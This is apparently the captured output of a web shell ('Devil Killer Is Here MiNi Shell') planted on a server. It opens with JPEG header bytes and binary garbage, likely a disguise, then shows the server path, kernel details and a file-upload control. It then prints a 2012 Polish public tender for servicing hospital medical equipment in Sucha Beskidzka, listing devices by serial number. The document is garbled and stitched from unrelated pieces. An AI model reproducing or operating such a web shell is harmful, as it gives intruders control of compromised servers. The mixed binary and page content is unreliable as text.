JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120717/255028-N-2012.html

<p class="kh_header"><b>Sucha Beskidzka: Usługi autoryzowanego serwisu sprzętu medycznego</b><br>
<b>Numer ogłoszenia: 255028 - 2012; data zamieszczenia: 17.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki  Zdrowotnej , ul. Szpitalna 22, 34-200 Sucha Beskidzka, woj. małopolskie, tel. (033) 872 31 11, faks (033) 872 31 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsuchabeskidzka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi autoryzowanego serwisu sprzętu medycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi autoryzowanego serwisu sprzętu medycznego okreslonego w pakietach 1-10 ( uzupełnienie).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
2. Dokument potwierdzający posiadanie autoryzacji producenta sprzętu na serwis urządzeń.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania wiedzy i doświadczenia,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) dysponowania odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia,
2. Wykaz pracowników wykonujących usługi serwisowe, wraz oświadczeniem potwierdzającym ich uprawnienia do wykonania usług będących przedmiotem zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) sytuacji ekonomicznej i finansowej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień niniejszej umowy może być dokonana przez strony 
w formie pisemnej w drodze aneksu do niniejszej umowy, pod rygorem nieważności.
2.	Zmiany postanowień niniejszej umowy, są dopuszczalne wyłącznie w przypadku, gdy nastąpiła:
    zmiana stawki podatku VAT - związanej z przedmiotem umowy - w tym
    przypadku zmianie ulegnie kwota podatku VAT i cena brutto, cena netto
    pozostanie niezmienna, w przypadku zmiany stawki podatku VAT w ramach
    niniejszej umowy zmiana stawki następuje z dniem wejścia w życie aktu
    prawnego zmieniającego stawkę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozsuchabeskidzka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Zespołu Opieki Zdrowotnej ul. Szpitalna 22, 34-200 Sucha Beskidzka, blok B. IV piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2012 godzina 10:00, miejsce: Sekretariat Zespołu Opieki Zdrowotnej  ul. Szpitalna 22, 34-200 Sucha Beskidzka, Blok C, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi autoryzowanego serwisu sprzętu medycznego :
Nazwa	nr seryjny	rok produkcji
Aparat do elektrokoagulacji VIO 300D	11305841	2009
Aparat do elektrokoagulacji VIO 300S	11303444	2009
Aparat do elektrokoagulacji ICC 300E	F 1942	2002
Aparat do elektrokoagulacji ICC 300E	11282798	2006
Aparat do elektrokagulacji ICC 300E	F1880	2001
Aparat do elektrokagulacji ICC 200E	D 1901	2000
Przystawka argonowa APC 300	1172	2000
Aparat do elektrokagulacji ICC 300E	D 2322	2000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi autoryzowanego serwisu sprzętu medycznego:
Nazwa	nr seryjny	rok produkcji
Defibrylator Lifepack 20 ze stymulacją	38477867	2009
Defibrylator Lifepack 20 ze stymulacją	38477877	2009
Defibrylator Lifepack 20 	38477854	2009
Stymulator wewnętrzny czasowy jednojamowy zewnętrzny model 5348	PEP100600R	2009
Stymulator wewnętrzny czasowy jednojamowy zewnętrzny model 5349	PEP100018R	2009
Stymulator wewnętrzny czasowy jednojamowy zewnętrzny model 5350	PEP100563R	2009
Defibrylator Lifepack 20 	35204601	2010
Defibrylator Lifepack 20 ze stymulacją	39208824	2010
Defibrylator Lifepack 20 ze stymulacją	39204609	2010
Defibrylator Lifepack 12 transportowy	38988382	2010
Defibrylator Lifepack 20	38477856	2009
Defibrylator Lifepack	30556627	2003
Defibrylator Lifepack	36130635	2008
Defibrylator Lifepack 12 transportowy	13843664	2002
Defibrylator Lifepack 12 transportowy	31382675	2001
Defibrylator Lifepack 12 transportowy	36304263	2008
Defibrylator Lifepack 20 	34332248	2006.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia sa usługi autortyzowanego serwisu sprzętu medycznego:
Nazwa	nr seryjny	rok produkcji
Stół operacyjny Diamond OY-02	2009112/009	2009
Łóżko regulowane w pełnym zakresie położeń, z zasilaniem elektrycznym z wagą Eleganza XC	20090236917	2009
Łóżko regulowane w pełnym zakresie położeń, z zasilaniem elektrycznym z wagą Eleganza XC	20090236918	2009
Łóżko regulowane w pełnym zakresie położeń, z zasilaniem elektrycznym z wagą Eleganza XC	20090236916	2009
Łóżko regulowane z przechyłami bocznymi, z zasilaniem elektrycznym Latera Acute	20090236905	2009
Łóżko regulowane z przechyłami bocznymi, z zasilaniem elektrycznym Latera Acute	20090236901	2009
Łóżko regulowane z przechyłami bocznymi, z zasilaniem elektrycznym Latera Acute	20090236902	2009
Łóżko regulowane z przechyłami bocznymi, z zasilaniem elektrycznym Latera Acute	20090236906	2009
Wózek do transportu chorych ES ES710 Economy	7296	2009
Łóżko wózek ES711X	10998	2010
Łóżko wózek ES711X	11000	2010
Łóżko wózek ES711X	11003	2010
Stół operacyjny do chirurgii ogólnej, urologicznej i ginekologicznej ONYX	2009/03/036	2009
Stół operacyjny do chirurgii ogólnej, urologicznej i ginekologicznej ONYX	2009/03/016	2009
Stół operacyjny z wyposażeniem specjalistycznym do chirurgii ortopedycznej i ogólnej ST8		2009.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi autoryzowanego serwisu sprzętu medycznego:
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92624	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92818	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92594	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92585	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	93828	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92815	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	93800	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92812	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92706	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92583	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92878	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92773	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	93796	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92832	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92648	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92721	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	93835	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92580	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92993	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92766	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92701	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92588	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92582	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	93801	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92686	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92770	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92836	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	93831	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92887	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92672	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92680	2009
Pompa strzykawkowa wraz z  stacją dokującą PERFUSOR SPACE	92779	2009
Pompa strzykawkowa do podaży profilu PCA PERFUSOR SPACE	92746	2009
Pompa strzykawkowa do podaży profilu PCA PERFUSOR SPACE	72697	2009
Pompa strzykawkowa do podaży profilu PCA PERFUSOR SPACE	92872	2009
Pompa strzykawkowa do podaży profilu PCA PERFUSOR SPACE	93799	2009
Pompa strzykawkowa do podaży profilu PCA PERFUSOR SPACE	92598	2009
Pompa strzykawkowa do podaży profilu PCA PERFUSOR SPACE	92581	2009
Pompa strzykawkowa do podaży profilu PCA PERFUSOR SPACE	92474	2009
Pompa objętościowa PERFUSOR SPACE	91710	2009
Pompa objętościowa PERFUSOR SPACE	91711	2009
Pompa objętościowa PERFUSOR SPACE	91615	2009
Pompa objętościowa PERFUSOR SPACE	91727	2009
Pompa objętościowa PERFUSOR SPACE	91725	2009
Pompa objętościowa PERFUSOR SPACE	91634	2009
Pompa objętościowa PERFUSOR SPACE	91671	2009
Pompa strzykawkowa PERFUSOR SPACE 8713030 	116179	2010
Pompa strzykawkowa PERFUSOR SPACE 8713030 	116186	2010
Pompa strzykawkowa PERFUSOR SPACE 8713030 	116283	2010
Pompa strzykawkowa PERFUSOR SPACE 8713030 	116183	2010
Pompa strzykawkowa PERFUSOR SPACE 8713030 	116200	2010
Pompa strzykawkowa PERFUSOR SPACE 8713030 	116214	2010
Pompa strzykawkowa PERFUSOR SPACE 8713030 	116296	2010
Pompa strzykawkowa PERFUSOR SPACE 	69092	2009
Stacja dokująca	29065	2009
Stacja dokująca	28747	2009
Stacja dokująca	29113	2009
Stacja dokująca	26483	2009
Stacja dokująca	26482	2009
Stacja dokująca	28728	2009
Stacja dokująca	26486	2009
Stacja dokująca	29064	2009.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi autoryzowanego serwisu sprzętu medycznego:
Wiertarka ortopedyczna z końcówką do piły oscylacyjnej Trauma Recon System	1608	2009
Wiertarka ortopedyczna oraz piła oscylacyjna Battery Power Line	4023	2009
		
Wiertarka ortopedyczna oraz piła oscylacyjna Battery Power Line	4110	2009.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi autoryzowanego serwisu sprzętu medycznego:
Myjnia automatyczna 2 stanowiskowa	40302001	2007
Myjnia automatyczna do endoskopów (dwustanowiskowa) Innova E3		2010.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi autoryzowanego serwisu sprzętu medycznego:Respirator transportowy O-TWO Medical 01Cu 7000-Careuent Mri	CUM7521-2010	2010.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi autoryzowanego serwisu sprzętu medycznego:
Nazwa	nr seryjny	rok produkcji
KTG-B350 LCD	ADBBC0060	2012.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9.</p>
